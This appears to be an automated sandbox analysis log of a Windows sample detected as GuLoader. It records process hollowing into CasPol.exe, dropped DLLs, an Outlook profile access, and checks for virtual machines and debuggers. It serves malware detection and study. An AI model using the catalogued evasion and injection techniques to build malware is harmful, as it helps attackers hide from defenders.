Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\file.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\file.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\file.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\file.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

1_2_004034F7

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\nsi5456.tmp

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_004021AA CoCreateInstance,

1_2_004021AA

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00404954 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

1_2_00404954

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8960:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8960:304:WilStaging_02

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: file.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: D:\SourceCode\ScenarioProfile\production_V4.2\ScenarioProfileFrameWork\Service\Config_Editor\obj\Release\ConfigXML_ScenarioProfile.pdb, source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr
Source:	Binary string: D:\SourceCode\ScenarioProfile\production_V4.2\ScenarioProfileFrameWork\Service\Config_Editor\obj\Release\ConfigXML_ScenarioProfile.pdb source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr
Source:	Binary string: MsMpCom.pdb source: file.exe, 00000001.00000003.4045308287.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmp, MsMpCom.dll.1.dr
Source:	Binary string: MsMpCom.pdbGCTL source: file.exe, 00000001.00000003.4045308287.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmp, MsMpCom.dll.1.dr

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.4202992291.0000000000D50000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_70AC30C0 push eax; ret	1_2_70AC30EE
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033B3735 push 00000074h; ret	1_2_033B377B
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033B3F12 push ecx; iretd	1_2_033B3F66
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033B7F9B push esi; retn 9F97h	1_2_033B801C
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033B3BF1 push 00000066h; iretd	1_2_033B3BF3
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033B664F push 764D0892h; retf	1_2_033B6654
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033B3EE6 push ecx; iretd	1_2_033B3F66
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033B88AA push BF000001h; iretd	1_2_033B88AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 6_2_1FCE8E67 push edi; retn 0000h	6_2_1FCE8E69

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_70AC1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

1_2_70AC1BFF

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\ConfigXML_ScenarioProfile.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\MsMpCom.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\nsv58DC.tmp\System.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect Any.run

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: file.exe, 00000001.00000002.4863048528.00000000034C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: file.exe, 00000001.00000002.4863048528.00000000034C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLL

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 404

Thread sleep time: -10145709240540247s >= -30000s

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Window / User API: threadDelayed 9558

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ConfigXML_ScenarioProfile.dll			Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MsMpCom.dll			Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_033AD722 rdtsc

1_2_033AD722

Source: C:\Users\user\Desktop\file.exe

Code function: K32EnumDeviceDrivers,

1_2_033BEE62

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node			graph_1-16713
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node			graph_1-16716

Source: file.exe, 00000001.00000002.4863550435.0000000005039000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.9086018370.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: file.exe, 00000001.00000002.4863550435.0000000005039000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.9086018370.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: CasPol.exe, 00000006.00000002.9086018370.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: file.exe, 00000001.00000002.4863550435.0000000005039000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.9086018370.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: file.exe, 00000001.00000002.4863550435.0000000005039000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.9086018370.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: file.exe, 00000001.00000002.4863550435.0000000005039000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.9086018370.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: CasPol.exe, 00000006.00000002.9086018370.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: CasPol.exe, 00000006.00000003.5393884407.0000000001078000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.9084665856.0000000001078000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.9083705847.0000000001018000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000001.00000002.4863048528.00000000034C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: file.exe, 00000001.00000002.4863550435.0000000005039000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.9086018370.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: file.exe, 00000001.00000002.4863550435.0000000005039000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.9086018370.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: file.exe, 00000001.00000002.4863550435.0000000005039000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.9086018370.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: CasPol.exe, 00000006.00000002.9086018370.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat
Source: file.exe, 00000001.00000002.4863048528.00000000034C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	1_2_00405C13
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0040683D FindFirstFileW,FindClose,	1_2_0040683D
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0040290B FindFirstFileW,	1_2_0040290B

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread information set: HideFromDebugger			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_70AC1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

1_2_70AC1BFF

Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033BDB04 mov eax, dword ptr fs:[00000030h]	1_2_033BDB04
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033BC7B0 mov eax, dword ptr fs:[00000030h]	1_2_033BC7B0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033B5BFF mov eax, dword ptr fs:[00000030h]	1_2_033B5BFF
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033B562F mov eax, dword ptr fs:[00000030h]	1_2_033B562F
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033B5E6F mov ebx, dword ptr fs:[00000030h]	1_2_033B5E6F
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033B5E59 mov ebx, dword ptr fs:[00000030h]	1_2_033B5E59
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033B5E59 mov eax, dword ptr fs:[00000030h]	1_2_033B5E59
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033B12AA mov eax, dword ptr fs:[00000030h]	1_2_033B12AA
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033B5D06 mov eax, dword ptr fs:[00000030h]	1_2_033B5D06
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033B5DCF mov eax, dword ptr fs:[00000030h]	1_2_033B5DCF
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033B5C4E mov eax, dword ptr fs:[00000030h]	1_2_033B5C4E
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033BC0A6 mov eax, dword ptr fs:[00000030h]	1_2_033BC0A6

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_033AD722 rdtsc

1_2_033AD722

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 6_2_2063E990 LdrInitializeThunk,

6_2_2063E990

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Users\user\Desktop\file.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: D50000

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\file.exe"	Jump to behavior
